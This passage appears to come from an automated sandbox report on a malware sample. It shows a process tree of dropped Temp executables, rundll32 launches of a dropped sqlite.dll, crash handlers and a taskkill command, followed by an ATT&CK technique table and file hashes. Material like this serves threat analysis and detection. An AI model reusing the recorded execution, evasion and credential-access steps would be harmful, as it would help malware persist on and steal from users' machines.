                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7332 -ip 7332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5700 -ip 5700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3848 -ip 3848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2192 -ip 2192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8CD2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\8CD2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 8692 -s 244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5700 -ip 5700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\B1DF.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\B1DF.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5700 -ip 5700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F561.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F561.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8692 -ip 8692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\39DE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\39DE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5C99.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\5C99.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:14468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 14468 -s 240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\79F6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\79F6.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:13912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 13912 -s 240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A4A1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A4A1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\123441egwegweg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\123441egwegweg.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 4416 -s 944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7868 -s 448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 7868 -ip 7868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding C55ED02B90EEE5A80F736BF1A48B375B C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 981FC81714771E73245AA90A919DEC4B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:12584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 98AA4772553E835064403B12767F8CFC E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:13484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C52A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C52A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4796 -s 240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:12532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8276 -ip 8276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 10160 -s 448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 10160 -ip 10160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 14468 -ip 14468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 14748 -ip 14748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 13912 -ip 13912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 8168 -ip 8168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 1988 -ip 1988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 4796 -ip 4796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 524 -p 4416 -ip 4416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:15356

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1518

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Exfiltration

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Impact

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1008c7d6874.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7b3895d03448f659e2934a8f9b0a52ae

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  084dc9cd061c5fb90bfc17a935d9b6ca8947a33c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097

